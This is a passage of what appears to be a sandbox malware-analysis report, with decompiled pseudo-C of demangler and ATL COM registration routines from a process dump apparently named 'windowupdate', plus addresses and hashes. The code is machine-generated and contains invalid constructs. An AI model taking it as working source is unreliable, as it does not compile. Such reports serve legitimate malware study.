									E00D4FB00(__eflags, _a4, 1, _a8) = _a4;
									return _a4;
								case 1:
									 *0xf20640 =  *0xf20640 + 1;
									 *0xf20640 =  *0xf20640 + 1;
									__edx = _a8;
									_a4 = E00D55490(__ebx, __edi, __esi, _a4, _a8);
									__eax = _a4;
									return _a4;
								case 2:
									 *0xf20640 =  *0xf20640 + 1;
									 *0xf20640 =  *0xf20640 + 1;
									__edx = _a8;
									_a4 = E00D56F40(__ebx, __edi, __esi, _a4, _a8, 1);
									__eax = _a4;
									return _a4;
								case 3:
									 *0xf20640 =  *0xf20640 + 1;
									 *0xf20640 =  *0xf20640 + 1;
									__ecx =  &_v92;
									__eax = E00D4F3F0( &_v92);
									__edx = _a8;
									 &_v100 = E00D53A20(__ebx, __edi, __esi,  &_v100, _a8, 0,  &_v100, 0);
									__ecx = _a4;
									__eax = _a4;
									return _a4;
								case 4:
									L19:
									__ecx = _a8;
									__ecx =  &_v84;
									__eax = E00D4F240( &_v84, _a8);
									__edx =  *0xf20640; // 0x0
									 *0xf20640 = __edx;
									__ecx =  &_v84;
									E00D5AB50( &_v84) =  &_v20;
									__ecx = _a4;
									E00D57370(_a4,  &_v20,  &_v20, 3) = _a4;
									return _a4;
								case 5:
									__ecx = _a8;
									__eax = E00D5A560(_a8);
									__eflags = __eax;
									if(__eax != 0) {
										_v52 = E00D50060("volatile", 8);
										_v48 = __edx;
										__eax =  &_v52;
										__ecx =  &_v20;
										__eax = E00D4F7E0( &_v20,  &_v52);
									} else {
										_v44 = E00D50060("volatile ", 9);
										_v40 = __edx;
										__edx =  &_v44;
										__ecx =  &_v20;
										__eax = E00D4F7E0( &_v20,  &_v44);
									}
									goto L19;
								case 6:
									 *0xf20640 =  *0xf20640 + 1;
									 *0xf20640 =  *0xf20640 + 1;
									__ecx = _a4;
									E00D4F350(_a4, 2) = _a4;
									return _a4;
								case 7:
									 *0xf20640 =  *0xf20640 + 1;
									 *0xf20640 =  *0xf20640 + 1;
									__ecx = _a8;
									__eax = E00D5A560(_a8);
									__eflags = __eax;
									if(__eax != 0) {
										_v68 = E00D50060("std::nullptr_t", 0xe);
										_v64 = __edx;
										__ecx =  &_v68;
										__ecx = _a4;
										E00D4F1F0(_a4,  &_v68) = _a4;
										return _a4;
									}
									_v60 = E00D50060("std::nullptr_t ", 0xf);
									_v56 = __edx;
									__ecx = _a8;
									__edx =  &_v60;
									_a4 = E00D4FAA0(_a4,  &_v60, _a8);
									__eax = _a4;
									return _a4;
								case 8:
									 *0xf20640 =  *0xf20640 + 1;
									 *0xf20640 =  *0xf20640 + 1;
									__edx = _a8;
									__ecx = _a4;
									E00D4F240(_a4, _a8) = _a4;
									return _a4;
								case 9:
									 *0xf20640 =  *0xf20640 + 1;
									 *0xf20640 =  *0xf20640 + 1;
									_a4 = E00D57B30(__ebx, __edi, __esi, __eflags, _a4);
									__eax = _a4;
									return _a4;
								case 0xa:
									goto L27;
							}
						}
						1 = 1 << 0;
						__ecx =  *0xf20640; // 0x0
						__edx =  *((char*)(__ecx + (1 << 0)));
						__eflags =  *((char*)(__ecx + (1 << 0)));
						if(__eflags == 0) {
							__eax = _a8;
							__ecx = _a4;
							E00D4FB00(__eflags, _a4, 1, _a8) = _a4;
							return _a4;
						}
						__ecx = _a4;
						E00D4F350(_a4, 2) = _a4;
						return _a4;
					case 2:
						L6:
						__edx = _a8;
						__ecx =  &_v76;
						__eax = E00D4F240( &_v76, _a8);
						__eax =  *0xf20640; // 0x0
						 *0xf20640 = __eax;
						__ecx =  &_v76;
						__eax = E00D5AB50( &_v76);
						__ecx =  &_v20;
						__edx = _a4;
						__eax = _a4;
						return _a4;
					case 3:
						__ecx = _a8;
						__eax = E00D5A560(_a8);
						__eflags = __eax;
						if(__eax != 0) {
							_v36 = E00D50060("volatile", 8);
							_v32 = __edx;
							__ecx =  &_v36;
							__ecx =  &_v20;
							__eax = E00D4F7E0( &_v20,  &_v36);
						} else {
							_v28 = E00D50060("volatile ", 9);
							_v24 = __edx;
							__eax =  &_v28;
							__ecx =  &_v20;
							__eax = E00D4F7E0( &_v20,  &_v28);
						}
						goto L6;
					case 4:
						goto L28;
				}
			}























                      0x00d56ab9
                      0x00d56abe
                      0x00d56ac6
                      0x00d56acd
                      0x00d56e3e
                      0x00d56e46
                      0x00000000
                      0x00d56e4e
                      0x00d56ad6
                      0x00d56add
                      0x00000000
                      0x00d56aee
                      0x00000000
                      0x00000000
                      0x00d56b8f
                      0x00d56b92
                      0x00d56b98
                      0x00d56b9c
                      0x00d56b9f
                      0x00d56be5
                      0x00d56bee
                      0x00d56bf4
                      0x00d56bf9
                      0x00d56bfc
                      0x00d56bff
                      0x00d56c03
                      0x00d56e2f
                      0x00d56e31
                      0x00d56e39
                      0x00000000
                      0x00d56e39
                      0x00d56c0c
                      0x00d56c0c
                      0x00d56c13
                      0x00000000
                      0x00d56e18
                      0x00d56e1e
                      0x00d56e2a
                      0x00000000
                      0x00000000
                      0x00d56c20
                      0x00d56c23
                      0x00d56c29
                      0x00d56c31
                      0x00d56c39
                      0x00000000
                      0x00000000
                      0x00d56c47
                      0x00d56c4a
                      0x00d56c52
                      0x00d56c5a
                      0x00d56c62
                      0x00000000
                      0x00000000
                      0x00d56c70
                      0x00d56c73
                      0x00d56c7b
                      0x00d56c7e
                      0x00d56c86
                      0x00d56c8e
                      0x00d56c97
                      0x00d56ca3
                      0x00000000
                      0x00000000
                      0x00d56d00
                      0x00d56d00
                      0x00d56d04
                      0x00d56d07
                      0x00d56d0c
                      0x00d56d15
                      0x00d56d1d
                      0x00d56d26
                      0x00d56d2a
                      0x00d56d36
                      0x00000000
                      0x00000000
                      0x00d56cb0
                      0x00d56cb3
                      0x00d56cb8
                      0x00d56cba
                      0x00d56cee
                      0x00d56cf1
                      0x00d56cf4
                      0x00d56cf8
                      0x00d56cfb
                      0x00d56cbc
                      0x00d56ccb
                      0x00d56cce
                      0x00d56cd1
                      0x00d56cd5
                      0x00d56cd8
                      0x00d56cd8
                      0x00000000
                      0x00000000
                      0x00d56d44
                      0x00d56d47
                      0x00d56d4f
                      0x00d56d57
                      0x00000000
                      0x00000000
                      0x00d56d69
                      0x00d56d6c
                      0x00d56d71
                      0x00d56d74
                      0x00d56d79
                      0x00d56d7b
                      0x00d56dbf
                      0x00d56dc2
                      0x00d56dc5
                      0x00d56dc9
                      0x00d56dd1
                      0x00000000
                      0x00d56dd1
                      0x00d56d8c
                      0x00d56d8f
                      0x00d56d92
                      0x00d56d96
                      0x00d56d9e
                      0x00d56da6
                      0x00000000
                      0x00000000
                      0x00d56dfe
                      0x00d56e01
                      0x00d56e07
                      0x00d56e0b
                      0x00d56e13
                      0x00000000
                      0x00000000
                      0x00d56dde
                      0x00d56de1
                      0x00d56deb
                      0x00d56df3
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00d56c13
                      0x00d56ba6
                      0x00d56ba9
                      0x00d56baf
                      0x00d56bb3
                      0x00d56bb5
                      0x00d56bb7
                      0x00d56bbd
                      0x00d56bc9
                      0x00000000
                      0x00d56bc9
                      0x00d56bd5
                      0x00d56bdd
                      0x00000000
                      0x00000000
                      0x00d56b4e
                      0x00d56b4e
                      0x00d56b52
                      0x00d56b55
                      0x00d56b5a
                      0x00d56b62
                      0x00d56b69
                      0x00d56b6c
                      0x00d56b72
                      0x00d56b76
                      0x00d56b82
                      0x00000000
                      0x00000000
                      0x00d56afe
                      0x00d56b01
                      0x00d56b06
                      0x00d56b08
                      0x00d56b3c
                      0x00d56b3f
                      0x00d56b42
                      0x00d56b46
                      0x00d56b49
                      0x00d56b0a
                      0x00d56b19
                      0x00d56b1c
                      0x00d56b1f
                      0x00d56b23
                      0x00d56b26
                      0x00d56b26
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: operator+$EmptyIterator_baseIterator_base::_MailboxName::isName::setchar_traitsstd::_
                      • String ID: B$std::nullptr_t$std::nullptr_t $volatile$volatile
                      • API String ID: 1073764026-1853825697
                      • Opcode ID: f94e7db180c74c8ef343b48dc3c467bb816013f18ed3ff186b83bc25260a23b1
                      • Instruction ID: 78a5fba2226a9744a44773adb3ec24748b463ee7d689112d5f4cf0898fc3db08
                      • Opcode Fuzzy Hash: f94e7db180c74c8ef343b48dc3c467bb816013f18ed3ff186b83bc25260a23b1
                      • Instruction Fuzzy Hash: 33B180B6900108ABDB14DF54DC92EEE3B75FB94305F048128FD199B252EB31EA45DBB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D5A1E0 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 239COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 89%
                      			E00D5A1E0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, signed char _a12) {
				signed int _v8;
				char _v24;
				signed char _v25;
				signed char _v26;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				signed int _v80;
				char _v84;
				signed int _v88;
				char _v92;
				char _v100;
				char _v108;
				char _v116;
				char _v124;
				char _v132;
				char _v140;
				char _v148;
				char _v156;
				char _v164;
				signed int _t75;
				signed int _t77;
				signed int _t81;
				void* _t82;
				void* _t83;
				intOrPtr _t87;
				char _t115;
				char _t117;
				signed int _t118;
				signed int _t123;
				void* _t127;
				intOrPtr _t129;
				signed int _t131;
				intOrPtr _t139;
				intOrPtr _t140;
				signed int _t143;
				signed int _t158;
				signed int _t163;
				intOrPtr _t168;
				signed int _t169;
				signed int _t172;
				intOrPtr _t174;
				signed int _t180;
				signed int _t181;
				signed int _t184;
				void* _t185;
				void* _t186;
				signed int _t187;
				void* _t188;
				void* _t190;
				void* _t191;

				_t186 = __esi;
				_t185 = __edi;
				_t127 = __ebx;
				_t75 =  *0xdf600c; // 0x71e60372
				_v8 = _t75 ^ _t187;
				_t77 =  *0xf20640; // 0x0
				_t129 =  *_t77 - 0x30;
				_v40 = _t129;
				if(_t129 < 0 || _v40 > 9) {
					E00D4F3F0( &_v36);
					_t169 =  *0xf20640; // 0x0
					if( *_t169 != 0x3f) {
						_v25 = 0;
						_v48 = E00D50060(0xdee94d, 0);
						_v44 = _t169;
						_t81 =  *0xf20640; // 0x0
						_t82 = E00D5AC10(_t81, "template-parameter-", 0x13);
						_t190 = _t188 + 0x14;
						if(_t82 != 0) {
							_t131 =  *0xf20640; // 0x0
							_t83 = E00D5AC10(_t131, "generic-type-", 0xd);
							_t191 = _t190 + 0xc;
							if(_t83 == 0) {
								_v25 = 1;
								_t115 = E00D50060("`generic-type-", 0xe);
								_t191 = _t191 + 8;
								_v92 = _t115;
								_v88 = _t169;
								_v48 = _v92;
								_v44 = _v88;
								_t158 =  *0xf20640; // 0x0
								 *0xf20640 = _t158 + 0xd;
							}
						} else {
							_v25 = 1;
							_t117 = E00D50060("`template-parameter-", 0x14);
							_t191 = _t190 + 8;
							_v84 = _t117;
							_v80 = _t169;
							_v48 = _v84;
							_v44 = _v80;
							_t118 =  *0xf20640; // 0x0
							 *0xf20640 = _t118 + 0x13;
						}
						if((_v25 & 0x000000ff) == 0) {
							if((_a12 & 0x000000ff) == 0) {
								L26:
								E00D4F820( &_v36, E00D4F080( &_v164, 0xf20640, 0x40));
								goto L27;
							}
							_t172 =  *0xf20640; // 0x0
							if( *_t172 != 0x40) {
								goto L26;
							}
							E00D4F820( &_v36, E00D4F3F0( &_v156));
							_t143 =  *0xf20640; // 0x0
							 *0xf20640 = _t143 + 1;
							goto L27;
						} else {
							E00D57C80(_t127, _t185, _t186,  &_v100);
							if(E00D5A510() == 0 ||  *0xf20650 == 0) {
								_v76 = E00D4FAA0( &_v140,  &_v48,  &_v100);
								E00D4F820( &_v36, E00D4FBB0(_v76,  &_v148, 0x27));
							} else {
								E00D57D80( &_v100,  &_v24, 0x10);
								_t174 =  *0xf20650; // 0x0
								_v68 = _t174;
								_v56 = _v68;
								 *0xdc62b0(E00D92B00( &_v24));
								_v60 = _v56();
								if(_v60 == 0) {
									_v72 = E00D4FAA0( &_v124,  &_v48,  &_v100);
									E00D4F820( &_v36, E00D4FBB0(_v72,  &_v132, 0x27));
								} else {
									_v26 = 0;
									_push(_v26 & 0x000000ff);
									E00D4F820( &_v36, E00D4E750( &_v116, _v60));
								}
							}
							L27:
							_t171 = _a8 & 0x000000ff;
							if((_a8 & 0x000000ff) != 0) {
								_t139 =  *0xf20638; // 0x0
								if(E00D5A590(_t139) == 0) {
									_t140 =  *0xf20638; // 0x0
									E00D4FF70(_t140,  &_v36);
								}
							}
							E00D4F240(_a4,  &_v36);
							_t87 = _a4;
							goto L31;
						}
					}
					E00D4F820( &_v36, E00D58500(_t127, _t185, _t186,  &_v108, 0));
					_t180 =  *0xf20640; // 0x0
					_v64 =  *_t180;
					_t163 =  *0xf20640; // 0x0
					 *0xf20640 = _t163 + 1;
					if(_v64 != 0x40) {
						_t181 =  *0xf20640; // 0x0
						 *0xf20640 = _t181 - 1;
						_t123 =  *0xf20640; // 0x0
						if( *_t123 == 0) {
							_v52 = 1;
						} else {
							_v52 = 2;
						}
						E00D4F920( &_v36, _v52);
					}
					goto L27;
				} else {
					_t184 =  *0xf20640; // 0x0
					_t171 = _t184 + 1;
					 *0xf20640 = _t184 + 1;
					_t168 =  *0xf20638; // 0x0
					E00D4F9A0(_t168, _a4, _v40);
					_t87 = _a4;
					L31:
					return E00D47280(_t87, _t127, _v8 ^ _t187, _t171, _t185, _t186);
				}
			}






























































                      0x00d5a1e0
                      0x00d5a1e0
                      0x00d5a1e0
                      0x00d5a1e9
                      0x00d5a1f0
                      0x00d5a1f3
                      0x00d5a1fb
                      0x00d5a1fe
                      0x00d5a201
                      0x00d5a23b
                      0x00d5a240
                      0x00d5a24c
                      0x00d5a2c2
                      0x00d5a2d5
                      0x00d5a2d8
                      0x00d5a2e2
                      0x00d5a2e8
                      0x00d5a2ed
                      0x00d5a2f2
                      0x00d5a32f
                      0x00d5a336
                      0x00d5a33b
                      0x00d5a340
                      0x00d5a342
                      0x00d5a34d
                      0x00d5a352
                      0x00d5a355
                      0x00d5a358
                      0x00d5a361
                      0x00d5a364
                      0x00d5a367
                      0x00d5a370
                      0x00d5a370
                      0x00d5a2f4
                      0x00d5a2f4
                      0x00d5a2ff
                      0x00d5a304
                      0x00d5a307
                      0x00d5a30a
                      0x00d5a313
                      0x00d5a316
                      0x00d5a319
                      0x00d5a321
                      0x00d5a321
                      0x00d5a37c
                      0x00d5a477
                      0x00d5a4ac
                      0x00d5a4c2
                      0x00000000
                      0x00d5a4c2
                      0x00d5a479
                      0x00d5a485
                      0x00000000
                      0x00000000
                      0x00d5a496
                      0x00d5a49b
                      0x00d5a4a4
                      0x00000000
                      0x00d5a382
                      0x00d5a386
                      0x00d5a395
                      0x00d5a452
                      0x00d5a46a
                      0x00d5a3a8
                      0x00d5a3b1
                      0x00d5a3b6
                      0x00d5a3bc
                      0x00d5a3cf
                      0x00d5a3d5
                      0x00d5a3e1
                      0x00d5a3e8
                      0x00d5a41f
                      0x00d5a434
                      0x00d5a3ea
                      0x00d5a3ec
                      0x00d5a3f3
                      0x00d5a404
                      0x00d5a404
                      0x00d5a439
                      0x00d5a4c7
                      0x00d5a4c7
                      0x00d5a4cd
                      0x00d5a4cf
                      0x00d5a4dc
                      0x00d5a4e2
                      0x00d5a4e8
                      0x00d5a4e8
                      0x00d5a4dc
                      0x00d5a4f4
                      0x00d5a4f9
                      0x00000000
                      0x00d5a4f9
                      0x00d5a37c
                      0x00d5a260
                      0x00d5a265
                      0x00d5a26e
                      0x00d5a271
                      0x00d5a27a
                      0x00d5a284
                      0x00d5a286
                      0x00d5a28f
                      0x00d5a295
                      0x00d5a29f
                      0x00d5a2aa
                      0x00d5a2a1
                      0x00d5a2a1
                      0x00d5a2a1
                      0x00d5a2b8
                      0x00d5a2b8
                      0x00000000
                      0x00d5a209
                      0x00d5a209
                      0x00d5a20f
                      0x00d5a212
                      0x00d5a220
                      0x00d5a226
                      0x00d5a22b
                      0x00d5a4fc
                      0x00d5a509
                      0x00d5a509

                      APIs
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00D5A23B
                      • Mailbox.LIBCMTD ref: 00D5A260
                      • DName::operator=.LIBVCRUNTIMED ref: 00D5A2B8
                      • und_strncmp.LIBCMTD ref: 00D5A2E8
                      • DName::getString.LIBCMTD ref: 00D5A3B1
                      • Mailbox.LIBCMTD ref: 00D5A404
                        • Part of subcall function 00D4F9A0: DName::DName.LIBVCRUNTIMED ref: 00D4F9B8
                      • Replicator::isFull.LIBCMTD ref: 00D5A4D5
                      • Replicator::operator+=.LIBCMTD ref: 00D5A4E8
                      • Mailbox.LIBCMTD ref: 00D5A4F4
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Mailbox$FullIterator_baseIterator_base::_NameName::Name::getName::operator=Replicator::isReplicator::operator+=Stringstd::_und_strncmp
                      • String ID: @$`generic-type-$`template-parameter-$generic-type-$template-parameter-
                      • API String ID: 3194277874-3433397351
                      • Opcode ID: 98e81e2ae495bbf3bdd680f6fc1613610f4f185d1374bb2ea9e0f251f900e4ef
                      • Instruction ID: 7a0f8b1d967162421068b6fd2a24ab8dd0a99ce52f95794c18eeb504f011b2c3
                      • Opcode Fuzzy Hash: 98e81e2ae495bbf3bdd680f6fc1613610f4f185d1374bb2ea9e0f251f900e4ef
                      • Instruction Fuzzy Hash: FEA14072D002289FDF24DFA8DC95AEEBBB5FF44301F144129E80967262EB705949CB71
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D3A960 Relevance: 39.0, APIs: 13, Strings: 9, Instructions: 472COMMON
                      Download Yara Rule
                      C-Code - Quality: 83%
                      			E00D3A960(void* __ebx, void* __eflags, intOrPtr _a4, signed int* _a8, signed int _a12) {
				signed int _v8;
				char _v16;
				signed int _v24;
				signed int* _v28;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				char _v184;
				signed int _v192;
				char* _v200;
				intOrPtr _v208;
				int* _v212;
				char* _v216;
				char _v224;
				signed int _v232;
				char _v364;
				char _v384;
				char _v404;
				int _v416;
				signed int _v424;
				char* _v428;
				char* _v432;
				char* _v436;
				char* _v440;
				char* _v444;
				char* _v448;
				char* _v456;
				int** _v464;
				intOrPtr* _v468;
				int* _v472;
				int** _v476;
				char* _v480;
				char* _v484;
				char* _v488;
				char* _v492;
				int* _v496;
				int* _v500;
				void* _v508;
				void* __edx;
				void* __edi;
				void* __esi;
				signed int _t175;
				signed int _t179;
				void* _t180;
				char* _t184;
				void* _t186;
				signed int _t189;
				signed int _t196;
				long _t221;
				long _t227;
				signed char _t231;
				void* _t238;
				signed int _t239;
				void* _t243;
				void* _t245;
				void* _t249;
				void* _t255;
				void* _t259;
				void* _t263;
				void* _t269;
				int* _t333;
				void* _t335;
				void* _t351;
				void* _t352;
				signed int _t354;
				void* _t355;
				void* _t356;
				int* _t357;
				int* _t362;
				int* _t365;

				_t269 = __ebx;
				_t351 =  &_v500;
				memset(_t351, 0xcccccccc, 0x7c << 2);
				_t356 = _t355 + 0xc;
				_t352 = _t351 + 0x7c;
				_t175 =  *0xdf600c; // 0x71e60372
				_v8 = _t175 ^ _t354;
				_v456 = 0;
				E00D3DE60( &_v16);
				_t368 = _a8;
				if(_a8 != 0) {
					_t179 = E00D31620( &_v16, _a4, 0xdc6390);
					_t357 = _t356 + 8;
					__eflags = _t179;
					if(_t179 == 0) {
						_t180 = E00D3DEE0( &_v16);
						_t353 = _t357;
						__imp__CoCreateInstance(0xdc7cd0, 0, 1, 0xdf02a0, _t180);
						__eflags = _t357 - _t357;
						_v24 = E00DC1520(_t180, _t357 - _t357);
						__eflags = _v24;
						if(__eflags >= 0) {
							_v24 = 0;
							_v28 = _a8;
							while(1) {
								__eflags =  *_v28;
								if( *_v28 == 0) {
									break;
								}
								_t239 = _v28[1];
								_v48 =  *_t239;
								_v44 =  *((intOrPtr*)(_t239 + 4));
								_v40 =  *((intOrPtr*)(_t239 + 8));
								_v36 =  *((intOrPtr*)(_t239 + 0xc));
								__eflags = _a12;
								if(_a12 == 0) {
									__eflags =  *_v28 - 1;
									if( *_v28 != 1) {
										__eflags =  *_v28 - 2;
										if(__eflags != 0) {
											_t245 = L00D84930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1c5e, 0, "%ls", L"pEntry->iType == 2");
											_t357 = _t357 + 0x18;
											__eflags = _t245 - 1;
											if(_t245 == 1) {
												asm("int3");
											}
										}
										_v476 = E00D3DE90( &_v16);
										_t353 = _t357;
										_t333 =  *_v476;
										_t243 =  *(_t333[8])(_v476, _a4, 1,  &_v48);
										__eflags = _t357 - _t357;
										E00DC1520(_t243, _t357 - _t357);
									} else {
										_v472 = E00D3DE90( &_v16);
										_t353 = _t357;
										_t333 = _v472;
										_t249 =  *((intOrPtr*)( *((intOrPtr*)( *_t333 + 0x18))))(_v472, _a4, 1,  &_v48);
										__eflags = _t357 - _t357;
										E00DC1520(_t249, _t357 - _t357);
									}
									L27:
									_v28 =  &(_v28[2]);
									continue;
								}
								__eflags =  *_v28 - 1;
								if( *_v28 != 1) {
									__eflags =  *_v28 - 2;
									if(__eflags != 0) {
										_t259 = L00D84930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1c4d, 0, "%ls", L"pEntry->iType == 2");
										_t357 = _t357 + 0x18;
										__eflags = _t259 - 1;
										if(_t259 == 1) {
											asm("int3");
										}
									}
									_v468 = E00D3DE90( &_v16);
									_t353 = _t357;
									_t333 =  *( *_v468 + 0x1c);
									_t255 =  *_t333(_v468, _a4, 1,  &_v48);
									__eflags = _t357 - _t357;
									_v24 = E00DC1520(_t255, _t357 - _t357);
								} else {
									_v464 = E00D3DE90( &_v16);
									_t353 = _t357;
									_t333 =  *_v464;
									_t263 =  *(_t333[5])(_v464, _a4, 1,  &_v48);
									__eflags = _t357 - _t357;
									_v24 = E00DC1520(_t263, _t357 - _t357);
								}
								__eflags = _v24;
								if(__eflags >= 0) {
									goto L27;
								} else {
									_v440 = _v24;
									E00D3B190( &_v16, __eflags);
									_t184 = _v440;
									goto L60;
								}
							}
							__eflags = _a12;
							if(__eflags != 0) {
								L59:
								_v448 = 0;
								E00D3B190( &_v16, __eflags);
								_t184 = _v448;
								goto L60;
							} else {
								goto L29;
							}
							while(1) {
								L29:
								_t353 = _t357;
								_t333 =  &_v184;
								__imp__StringFromGUID2(_a4, _t333, 0x40);
								__eflags = _t357 - _t357;
								_t189 = E00DC1520(_a4, _t357 - _t357);
								__eflags = _t189;
								if(_t189 == 0) {
									_v480 = 0;
								} else {
									_v480 = 1;
								}
								_v192 = _v480;
								__eflags = _v192;
								if(__eflags == 0) {
									_t238 = L00D84930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1c69, 0, "%ls", L"__atl_condVal");
									_t357 = _t357 + 0x18;
									__eflags = _t238 - 1;
									if(_t238 == 1) {
										asm("int3");
									}
								}
								__eflags = _v192;
								if(__eflags == 0) {
									break;
								}
								__eflags = 0;
								if(0 != 0) {
									continue;
								}
								_v200 = 0;
								_v208 = E00D31AB0();
								_v212 = 0;
								_v216 = 0;
								E00D3F2E0( &_v224);
								_v212 =  &_v184;
								__eflags = _v212;
								if(__eflags != 0) {
									_t333 = _v212;
									_v200 = E00D85A70(_t333) + 1;
									_t196 = E00D31780(_t333, _t353, __eflags,  &_v200, _v200, 2);
									_t357 = _t357 + 0x10;
									__eflags = _t196;
									if(_t196 >= 0) {
										__eflags = _v200 - 0x400;
										if(__eflags > 0) {
											L45:
											_v500 = E00D3F270(_t269,  &_v224, __eflags, _v200);
											L46:
											_t333 = _v500;
											_v488 = E00D31BB0(_v212, _t353, _t333, _v212, _v200, _v208);
											L47:
											_v484 = _v488;
											L48:
											_v232 = _v484;
											__eflags = _v232;
											if(__eflags != 0) {
												E00D326C0(_t269, _t352, _t353, __eflags,  &_v364, 0x80, "CLSID\\");
												E00D32780(_t269, _t352, _t353, __eflags,  &_v364, 0x80, _v232);
												E00D32780(_t269, _t352, _t353, __eflags,  &_v364, 0x80, "\\Required Categories");
												_t362 = _t357 + 0x24;
												E00D341F0( &_v384, 0x80000000);
												E00D341C0( &_v404, 0);
												_v416 = 0;
												_v424 = E00D345F0( &_v404, _t353, E00D34250( &_v384),  &_v364, 0x20019);
												__eflags = _v424;
												if(__eflags == 0) {
													_t353 = _t362;
													_t227 = RegQueryInfoKeyA(E00D34250( &_v404), 0, 0, 0,  &_v416, 0, 0, 0, 0, 0, 0, 0);
													__eflags = _t362 - _t362;
													_v424 = E00DC1520(_t227, _t362 - _t362);
													E00D34420( &_v404, _t362);
													__eflags = _v424;
													if(__eflags == 0) {
														__eflags = _v416;
														if(__eflags == 0) {
															E00D34310( &_v384, _t353,  &_v364);
														}
													}
												}
												E00D326C0(_t269, _t352, _t353, __eflags,  &_v364, 0x80, "CLSID\\");
												_t333 =  &_v364;
												E00D32780(_t269, _t352, _t353, __eflags, _t333, 0x80, _v232);
												E00D32780(_t269, _t352, _t353, __eflags,  &_v364, 0x80, "\\Implemented Categories");
												_t365 = _t362 + 0x24;
												_v424 = E00D345F0( &_v404, _t353, E00D34250( &_v384),  &_v364, 0x20019);
												__eflags = _v424;
												if(__eflags == 0) {
													_t353 = _t365;
													_t333 =  &_v416;
													_t221 = RegQueryInfoKeyA(E00D34250( &_v404), 0, 0, 0, _t333, 0, 0, 0, 0, 0, 0, 0);
													__eflags = _t365 - _t365;
													_v424 = E00DC1520(_t221, _t365 - _t365);
													E00D34420( &_v404, _t365);
													__eflags = _v424;
													if(__eflags == 0) {
														__eflags = _v416;
														if(__eflags == 0) {
															E00D34310( &_v384, _t353,  &_v364);
														}
													}
												}
												E00D34220( &_v404, __eflags);
												E00D34220( &_v384, __eflags);
											}
											E00D3F220( &_v224);
											goto L59;
										}
										_t231 = E00D31900(__eflags, _v200);
										_t357 = _t357 + 4;
										__eflags = _t231 & 0x000000ff;
										if(__eflags == 0) {
											goto L45;
										}
										_v492 =  &(_v200[0x24]);
										E00DBF1D0(_v492);
										_v496 = _t357;
										E00DC13A0(_v496, _v492,  &_v456);
										_v496 =  &(_v496[8]);
										_v500 = _v496;
										goto L46;
									}
									_v488 = 0;
									goto L47;
								}
								_v484 = 0;
								goto L48;
							}
							_v444 = 0xd;
							E00D3B190( &_v16, __eflags);
							_t184 = _v444;
						} else {
							_v436 = 0;
							E00D3B190( &_v16, __eflags);
							_t184 = _v436;
						}
					} else {
						__eflags = 0;
						if(0 == 0) {
							__eflags = L00D84930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1c2e, 0, "%ls", L"0 && \"Use OBJECT_ENTRY_NON_CREATEABLE_EX macro if you want to register class categories for non creatable objects.\"") - 1;
							if(__eflags == 0) {
								asm("int3");
							}
						}
						_v432 = 0;
						E00D3B190( &_v16, __eflags);
						_t184 = _v432;
					}
					goto L60;
				} else {
					_v428 = 0;
